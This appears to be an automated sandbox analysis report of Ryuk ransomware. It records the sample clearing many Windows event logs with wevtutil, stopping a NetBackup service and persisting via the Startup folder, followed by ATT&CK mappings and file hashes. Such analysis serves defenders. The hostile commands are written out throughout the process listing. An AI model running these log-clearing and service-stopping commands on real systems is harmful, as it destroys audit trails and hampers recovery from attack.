wevtutil.exe cl "Microsoft-Windows-SPB-HIDI2C/Analytic"
3⤵
PID:4276

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Schannel-Events/Perf"
3⤵
PID:3524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sdbus/Analytic"
3⤵
PID:5052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sdbus/Debug"
3⤵
PID:3528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sdstor/Analytic"
3⤵
- Clears Windows event logs
PID:4452

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
3⤵
PID:4712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
3⤵
PID:4160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SearchUI/Diagnostic"
3⤵
PID:1756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SearchUI/Operational"
3⤵
PID:4580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SecureAssessment/Operational"
3⤵
PID:1584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Adminless/Operational"
3⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
3⤵
PID:3568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
3⤵
PID:4664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-EnterpriseData-FileRevocationManager/Operational"
3⤵
PID:5088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Operational"
3⤵
PID:2348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Performance"
3⤵
PID:536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
3⤵
PID:1104

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-IdentityStore/Performance"
3⤵
PID:4956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational"
3⤵
PID:4848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Mitigations/KernelMode"
3⤵
PID:2408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Mitigations/UserMode"
3⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Netlogon/Operational"
3⤵
PID:2260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-GC/Analytic"
3⤵
PID:3216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-GenuineCenter-Logging/Operational"
3⤵
PID:4128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-Notifications/ActionCenter"
3⤵
PID:4552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX/Analytic"
3⤵
PID:4288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
3⤵
PID:1316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-UserConsentVerifier/Audit"
3⤵
PID:2688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Vault/Performance"
3⤵
PID:4292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Admin"
3⤵
PID:3892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Operational"
3⤵
PID:3896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Perf"
3⤵
PID:4432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SendTo/Diagnostic"
3⤵
PID:3712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
3⤵
PID:4832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sensors/Debug"
3⤵
PID:2308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sensors/Performance"
3⤵
PID:1912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Serial-ClassExtension-V2/Analytic"
3⤵
PID:4896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Serial-ClassExtension/Analytic"
3⤵
PID:732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
3⤵
PID:4700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
3⤵
PID:2948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
3⤵
PID:2880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Servicing/Debug"
3⤵
PID:292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync-Azure/Debug"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync-Azure/Operational"
3⤵
PID:3396

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Analytic"
3⤵
PID:4140

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Debug"
3⤵
PID:1452

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Operational"
3⤵
PID:2776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync/Analytic"
3⤵
PID:4976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync/Debug"
3⤵
PID:3468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync/Operational"
3⤵
PID:1772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync/VerboseDebug"
3⤵
- Clears Windows event logs
PID:4936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
3⤵
PID:2324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
3⤵
PID:4840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupPlatform/Analytic"
3⤵
PID:4212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
3⤵
PID:4488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
3⤵
PID:2568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
3⤵
PID:1868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AppWizCpl/Diagnostic"
3⤵
PID:3436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
3⤵
PID:3736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
3⤵
PID:4744

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
3⤵
PID:2516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredentialProviderUser/Diagnostic"
3⤵
- Clears Windows event logs
PID:3284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
3⤵
PID:3360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-LogonUI/Diagnostic"
3⤵
PID:4776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
3⤵
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter"
3⤵
PID:4944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/ActionCenter"
3⤵
PID:3200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/AppDefaults"
3⤵
- Clears Windows event logs
PID:4764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
3⤵
PID:3936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/LogonTasksChannel"
3⤵
PID:508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/Operational"
3⤵
PID:4464

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
3⤵
PID:1908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-LockScreenContent/Diagnostic"
3⤵
PID:5092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-OpenWith/Diagnostic"
3⤵
- Clears Windows event logs
PID:1304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
3⤵
PID:1684

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
3⤵
PID:3560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Diagnostic"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Operational"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
3⤵
PID:3848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SleepStudy/Diagnostic"
3⤵
PID:1972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmartCard-Audit/Authentication"
3⤵
PID:1376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmartCard-DeviceEnum/Operational"
3⤵
PID:1256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmartCard-TPM-VCard-Module/Admin"
3⤵
PID:1240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmartCard-TPM-VCard-Module/Operational"
3⤵
PID:3280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmartScreen/Debug"
3⤵
PID:2276

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmbClient/Audit"
3⤵
PID:4344

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmbClient/Connectivity"
3⤵
PID:668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmbClient/Diagnostic"
3⤵
PID:4992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmbClient/Security"
3⤵
PID:2756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
3⤵
PID:2020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
3⤵
PID:3708

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
3⤵
PID:1704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Spellchecking-Host/Analytic"
3⤵
PID:4952

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SruMon/Diagnostic"
3⤵
PID:1640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SrumTelemetry"
3⤵
PID:4852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StateRepository/Debug"
3⤵
PID:4048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StateRepository/Diagnostic"
3⤵
PID:3208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StateRepository/Operational"
3⤵
PID:4584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StateRepository/Restricted"
3⤵
PID:3732

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\system32\net.exe
net stop NetBackup BMR MTFTP Service /y
1⤵
PID:3968

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
2⤵
PID:4504

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Indicator Removal on Host

T1070

File Deletion

T1107

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RYUKID
Filesize
8B

MD5
2f395624ddacce3c3e6cf11b3078da90

SHA1
20c577893acf550106fa863b5ca1caf02a548604

SHA256
2ce7d68b21ed836500e1a3434195477e1a174f3ecb489eb87a9a24d715cce5df

SHA512
27823cdde31b2e38294391d31805f2fb7231511fbca036a7e009de38b46f22f2b737a593f25c8dcd5d09b35ea03de069a774438b04c9753dedc3b5b6c5332c17

Download Submit
C:\ProgramData\RyukReadMe.txt
Filesize
1KB

MD5
d0484f1f0cdbb1714d57c85d6fde31af

SHA1
93bcd85444aa945d111a6d2c8c8114ff35d84355

SHA256
df35aa15068517fc7fe657442f0cad225c55cfe1273167f3f7647ada7d8a5e2a

SHA512
21003cd6122f9725792d0235e6b71ff4740f308a5770912aeb6825b42a0b332f275679d32117c88967f87d296ca52632d43f78ca1b4c90d05c3480abf7e2026c

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
74d58b8e40cc14c1d533107f034c2903

SHA1
1cc95ede361e228519d1c8e9dc849d43987090d8

SHA256
b5d20785172951ef70b7bf1001e3f0ad7288e421e360ec05f7723fa352b68f7e

SHA512
13e1590057c1ebfe34a830b1c12b7099ce6ea26ef2eaea878ba58d0d5e73da09d9e039b01751c80fe1f2ab24363ffe98d49736c4bae83ccf03cde31345643305

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
74d58b8e40cc14c1d533107f034c2903

SHA1
1cc95ede361e228519d1c8e9dc849d43987090d8

SHA256
b5d20785172951ef70b7bf1001e3f0ad7288e421e360ec05f7723fa352b68f7e

SHA512
13e1590057c1ebfe34a830b1c12b7099ce6ea26ef2eaea878ba58d0d5e73da09d9e039b01751c80fe1f2ab24363ffe98d49736c4bae83ccf03cde31345643305

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
a7cabe8d130a39dc94918b949161f9a1

SHA1
9c50b9a41d18c42f438721fc7ed20081ee62ac29

SHA256
e42c503e5a01cf4f773e52e191a95febb334292b7c10678393132ffe8d0e17d0

SHA512
acd348036813ae91fe7931e7624c6d5ddbe124301170b309866aaf6401898fd95c524fe7920cc8cda536583bdddc73d5edbee8b73583cb2b1425498c2ba87116

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
a7cabe8d130a39dc94918b949161f9a1

SHA1
9c50b9a41d18c42f438721fc7ed20081ee62ac29

SHA256
e42c503e5a01cf4f773e52e191a95febb334292b7c10678393132ffe8d0e17d0

SHA512
acd348036813ae91fe7931e7624c6d5ddbe124301170b309866aaf6401898fd95c524fe7920cc8cda536583bdddc73d5edbee8b73583cb2b1425498c2ba87116

Download Submit
C:\ProgramData\ryuk.exe
Filesize
885KB

MD5
154b73d0a7aa19df12364a78b235f29f

SHA1
5e39ad8cd8f05d29b7587a876c318be5c0511dcc

SHA256
f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea

SHA512
bf32fb8e846170bb5f2c9505e5577e5d3b31f3f9a43030b5f3268d66f3d11f3c983b231742f0d51488c4a288639c0d9e91a911fec0b016d54047e582695a98e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID
Filesize
8B

MD5
2f395624ddacce3c3e6cf11b3078da90

SHA1
20c577893acf550106fa863b5ca1caf02a548604

SHA256
2ce7d68b21ed836500e1a3434195477e1a174f3ecb489eb87a9a24d715cce5df

SHA512
27823cdde31b2e38294391d31805f2fb7231511fbca036a7e009de38b46f22f2b737a593f25c8dcd5d09b35ea03de069a774438b04c9753dedc3b5b6c5332c17

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1
Filesize
2KB

MD5
74d58b8e40cc14c1d533107f034c2903

SHA1
1cc95ede361e228519d1c8e9dc849d43987090d8

SHA256
b5d20785172951ef70b7bf1001e3f0ad7288e421e360ec05f7723fa352b68f7e

SHA512
13e1590057c1ebfe34a830b1c12b7099ce6ea26ef2eaea878ba58d0d5e73da09d9e039b01751c80fe1f2ab24363ffe98d49736c4bae83ccf03cde31345643305

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2
Filesize
292B

MD5
a7cabe8d130a39dc94918b949161f9a1

SHA1
9c50b9a41d18c42f438721fc7ed20081ee62ac29

SHA256
e42c503e5a01cf4f773e52e191a95febb334292b7c10678393132ffe8d0e17d0

SHA512
acd348036813ae91fe7931e7624c6d5ddbe124301170b309866aaf6401898fd95c524fe7920cc8cda536583bdddc73d5edbee8b73583cb2b1425498c2ba87116

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
Filesize
885KB

MD5
154b73d0a7aa19df12364a78b235f29f

SHA1
5e39ad8cd8f05d29b7587a876c318be5c0511dcc

SHA256
f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea

SHA512
bf32fb8e846170bb5f2c9505e5577e5d3b31f3f9a43030b5f3268d66f3d11f3c983b231742f0d51488c4a288639c0d9e91a911fec0b016d54047e582695a98e0

Download Submit
memory/100-194-0x0000000000000000-mapping.dmp

Download
memory/212-165-0x0000000000000000-mapping.dmp

Download
memory/364-184-0x0000000000000000-mapping.dmp

Download
memory/636-178-0x0000000000000000-mapping.dmp

Download
memory/640-195-0x0000000000000000-mapping.dmp

Download
memory/668-136-0x0000000000000000-mapping.dmp

Download
memory/732-173-0x0000000000000000-mapping.dmp

Download
memory/844-150-0x0000000000000000-mapping.dmp

Download
memory/920-138-0x0000000000000000-mapping.dmp

Download
memory/960-163-0x0000000000000000-mapping.dmp

Download
memory/984-200-0x0000000000000000-mapping.dmp

Download
memory/1068-188-0x0000000000000000-mapping.dmp

Download
memory/1172-181-0x0000000000000000-mapping.dmp

Download
memory/1176-145-0x0000000000000000-mapping.dmp

Download
memory/1288-179-0x0000000000000000-mapping.dmp

Download
memory/1412-189-0x0000000000000000-mapping.dmp

Download
memory/1556-196-0x0000000000000000-mapping.dmp

Download
memory/1656-197-0x0000000000000000-mapping.dmp

Download
memory/1688-170-0x0000000000000000-mapping.dmp

Download
memory/1772-191-0x0000000000000000-mapping.dmp

Download
memory/1772-153-0x0000000000000000-mapping.dmp

Download
memory/1812-140-0x0000000000000000-mapping.dmp

Download
memory/1836-199-0x0000000000000000-mapping.dmp

Download
memory/2024-201-0x0000000000000000-mapping.dmp

Download
memory/2088-192-0x0000000000000000-mapping.dmp

Download
memory/2244-149-0x0000000000000000-mapping.dmp

Download
memory/2256-203-0x0000000000000000-mapping.dmp

Download
memory/2288-202-0x0000000000000000-mapping.dmp

Download
memory/2308-176-0x0000000000000000-mapping.dmp

Download
memory/2440-168-0x0000000000000000-mapping.dmp

Download
memory/2732-183-0x0000000000000000-mapping.dmp

Download
memory/2800-171-0x0000000000000000-mapping.dmp

Download
memory/3012-146-0x0000000000000000-mapping.dmp

Download
memory/3112-186-0x0000000000000000-mapping.dmp

Download
memory/3216-185-0x0000000000000000-mapping.dmp

Download
memory/3368-205-0x0000000000000000-mapping.dmp

Download
memory/3392-155-0x0000000000000000-mapping.dmp

Download
memory/3436-204-0x0000000000000000-mapping.dmp

Download
memory/3512-152-0x0000000000000000-mapping.dmp

Download
memory/3528-139-0x0000000000000000-mapping.dmp

Download
memory/3756-180-0x0000000000000000-mapping.dmp

Download
memory/3892-193-0x0000000000000000-mapping.dmp

Download
memory/3896-156-0x0000000000000000-mapping.dmp

Download
memory/3972-175-0x0000000000000000-mapping.dmp

Download
memory/4008-206-0x0000000000000000-mapping.dmp

Download
memory/4188-151-0x0000000000000000-mapping.dmp

Download
memory/4252-142-0x0000000000000000-mapping.dmp

Download
memory/4256-137-0x0000000000000000-mapping.dmp

Download
memory/4288-190-0x0000000000000000-mapping.dmp

Download
memory/4320-187-0x0000000000000000-mapping.dmp

Download
memory/4324-198-0x0000000000000000-mapping.dmp

Download
memory/4380-159-0x0000000000000000-mapping.dmp

Download
memory/4392-154-0x0000000000000000-mapping.dmp

Download
memory/4484-144-0x0000000000000000-mapping.dmp

Download
memory/4524-160-0x0000000000000000-mapping.dmp

Download
memory/4560-143-0x0000000000000000-mapping.dmp

Download
memory/4564-148-0x0000000000000000-mapping.dmp

Download
memory/4768-134-0x0000000000000000-mapping.dmp

Download
memory/4800-174-0x0000000000000000-mapping.dmp

Download
memory/4808-133-0x0000000000000000-mapping.dmp

Download
memory/4844-132-0x0000000000000000-mapping.dmp

Download
memory/4964-177-0x0000000000000000-mapping.dmp

Download
memory/5072-182-0x0000000000000000-mapping.dmp

Download
memory/5100-147-0x0000000000000000-mapping.dmp

Download